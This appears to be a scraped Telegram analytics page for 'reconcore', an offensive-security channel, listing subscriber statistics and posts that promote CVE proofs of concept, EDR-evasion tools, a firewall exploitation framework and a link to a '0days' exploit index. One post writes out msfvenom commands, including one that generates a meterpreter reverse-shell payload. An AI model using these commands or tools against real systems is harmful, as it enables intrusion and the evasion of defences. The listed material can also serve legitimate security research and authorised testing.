Available now! Telegram Research 2025 — the year's key insights 
reconcore
Open in Telegram
#vulnerability #research #cve #rce #lpe #poc #tools #pentest #redteam #blueteam #offensivesecurity #technique #methods Educational use only. Content from public sources. Admin holds no liability for misuse. Users are solely responsible for their actions.
Show more2 167
Subscribers
+224 hours
+117 days
+5230 days
Data loading in progress...
Similar Channels
Tags Cloud
Incoming and Outgoing Mentions
---
---
---
---
---
---
Attracting Subscribers
June '26
June '26
+46
in 0 channels
May '26
+92
in 1 channels
Get PRO
April '26
+89
in 2 channels
Get PRO
March '26
+116
in 1 channels
Get PRO
February '26
+145
in 1 channels
Get PRO
January '26
+157
in 2 channels
Get PRO
December '25
+317
in 3 channels
Get PRO
November '25
+170
in 0 channels
Get PRO
October '25
+216
in 1 channels
Get PRO
September '25
+125
in 2 channels
Get PRO
August '25
+118
in 5 channels
Get PRO
July '25
+96
in 2 channels
Get PRO
June '25
+51
in 1 channels
Get PRO
May '25
+68
in 3 channels
Get PRO
April '25
+117
in 2 channels
Get PRO
March '25
+84
in 1 channels
Get PRO
February '25
+108
in 1 channels
Get PRO
January '25
+73
in 2 channels
Get PRO
December '24
+4
in 0 channels
Get PRO
November '24
+127
in 0 channels
Get PRO
October '24
+38
in 0 channels
Get PRO
September '24
+37
in 0 channels
Get PRO
August '24
+328
in 0 channels
Get PRO
July '240
in 0 channels
Get PRO
June '24
+15
in 1 channels
| Date | Subscriber Growth | Mentions | Channels | |
| 17 June | +1 | |||
| 16 June | +4 | |||
| 15 June | +5 | |||
| 14 June | +1 | |||
| 13 June | +6 | |||
| 12 June | +1 | |||
| 11 June | +3 | |||
| 10 June | +3 | |||
| 09 June | +3 | |||
| 08 June | +1 | |||
| 07 June | +4 | |||
| 06 June | +1 | |||
| 05 June | +1 | |||
| 04 June | +4 | |||
| 03 June | 0 | |||
| 02 June | +6 | |||
| 01 June | +2 |
Channel Posts
| 2 |  CVE-2026-20245 Cisco Catalyst SD-WAN Manager Privilege Escalation
#pe #cve #cisco @reconcore | 164 |
| 3 |  Index of /0days/ 💣
https://gibliz.taile5d4a8.ts.net/0days/
#exploit #rce @reconcore | 241 |
| 4 | #7z #file | 234 |
| 5 | группа доступна по одобрению администратора
запрещается:
рассылать рассылка реклам/
распространять исполняемые файлы.
administration | 468 |
| 6 | группа доступна по одобрению администратора
запрещается:
рассылать рассылка реклам/
распространять исполняемые файлы. | 3 |
| 7 | Ivanti Sentry Pre-Auth RCE
Ivanti Sentry authentication bypass and remote code execution vulnerabilities CVE-2026-10520, CVE-2026-10523.
Blog: https://labs.watchtowr.com/more-evidence-that-words-dont-mean-what-we-thought-they-meant-ivanti-sentry-pre-auth-os-command-injection-cve-2026-10520/ | 86 |
| 8 | https://t.me/+PQ3ekq7avh80M2Iy | 291 |
| 9 |  No text... | 216 |
| 10 |  RoguePlanet
Windows Defender LPE. The exploit is a race condition, so it's a hit or miss. I have managed to get a 100% success rate on some machines while it struggled to work on others. The exploit has been tested in Windows 11 (Official channel + Canary) and Windows 10 with june 2026 patch installed. The PoC however does not work in Windows Server since standard users cannot mount an ISO image, I'm confident that all Windows Server versions are vulnerable as well, you just need to redesign the exploit.
#vulnerability #race_condition #lpe #poc @reconcore | 725 |
| 11 | BOF Cocktails in Cobalt Strike: Instrumenting BOFs with BEACON_INLINE_EXECUTE and Crystal Palace
Original text: “BOF Cocktails in Cobalt Strike” — Rasta Mouse, rastamouse.me (05 Jun 2026). Code blocks and the screenshot below are reproduced verbatim from the source with attribution.
Post-exploitation Beacon Object Files (BOFs) historically inherited their evasion posture from whatever agent or loader executed them. If the loader took care of unhooking, masking,…
#redteam #bof @reconcore | 646 |
| 12 |  QuadRF lets you directly explore the RF environment around you. See where signals are, the way they propagate, and how antennas and the surrounding environment interact. At 30 fps, you can map WiFi devices in a room, quadcopters in the sky, or other wireless transmitters. Expanding beyond vision and LiDAR, your robots can use QuadRF to gain real-time spatial awareness of surrounding radio beacons and access points.
#rf #sdr @reconcore | 571 |
| 13 | DLL Hijacking Vulnerability Scanner
SearchAvailableExe is a comprehensive security research tool designed to identify and analyze DLL hijacking vulnerabilities in Windows executable files. This tool systematically scans signed executables to find potential DLL hijacking opportunities, making it valuable for security researchers, penetration testers, and system administrators.
#pe #re #dll #injection #analysis #binary #vulnerability #scanner #hijacking #security #research @reconcore | 509 |
| 14 |  FirewallXPL-Forge
Perimeter security exploitation framework — 164 modules covering FW, NGFW, UTM, WAF, VPN, NAC, LB, and OT/ICS firewalls (Fortinet, Cisco, Palo Alto, F5, Citrix, Check Point, SonicWall, Ivanti, Siemens, Moxa, +13 vendors). GPU-accelerated, ML-driven, async concurrency, Rich TUI.
#python #firewall #penetration_testing #pentest #ngfw #exploitation #framework #redteam #ics #security #vulnerability #scanner #waf #bypass #vpn #exploit #ot @reconcore | 493 |
| 15 | Shellcode-EDR-Evasion-Loader
shellcode loader with XOR encryption and EDR evasion techniques. for security research and authorized testing only.
payload:
msfvenom -p windows/x64/exec cmd=calc.exe -f raw -o payload.bin
reverse shell:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=_ LPORT=_ -f raw -o payload.bin
#shellcode #loader #windows #security #edr #evasion @reconcore | 504 |
| 16 |  c2detect
C2 server fingerprinter — Cobalt Strike, Sliver, Mythic, Havoc, Brute Ratel
cognis.digital #python #cli #automation #infosec #pentest #offensivesecurity #redteam @reconcore | 572 |
| 17 | EDRChoker
Client–server EDRs have an inherent weakness: they must maintain server connectivity to be effective. When isolated from their server they lose much of their capability, and administrators can no longer collect or monitor logs from those agents. EDRChoker uses policy-based Quality of Service (QoS) to throttle EDR agents to the lowest bandwidth; when agents attempt to connect they will consistently time out due to the extremely low bandwidth.
Blog: https://www.zerosalarium.com/2026/06/edrchoker-choking-telemetry-stream-block-edr.html
In this article I present a technique for interfering with the client–server connection of an EDR. It’s different from EDR connection-blocking methods that use the Windows Firewall or the Windows Filtering Platform (WFP). | 606 |
| 18 | CVE-2026-0826: Unauthenticated stack buffer overflow in HP Poly VVX and Trio VoIP Phones (RCE as root)
Vulnerable: VVX 150, VVX 250, VVX 350, and VVX 450), as well as Trio IP Conference series (Trio 8800, Trio 8500, and Trio 8300).
Blog: https://www.rapid7.com/blog/post/ve-cve-2026-0826-critical-unauthenticated-stack-buffer-overflow-hp-poly-vvx-trio-voip-phones-fixed/ | 567 |
| 19 | Hidden HTTP/2 Bomb
*
FOR nginx, Apache httpd, Microsoft IIS, Envoy, Cloudflare Pingora
*
WriteUP + LABs + PoCs | 695 |
| 20 | DarkReplica (CVE-2026-23631)
Redis Post-Auth RCE Exploit
The full technical writeup can be found here: https://www.zeroday.cloud/blog/redis-cve-2026-23631-dark-replica
#cve #redis #technique #rce @reconcore | 663 |
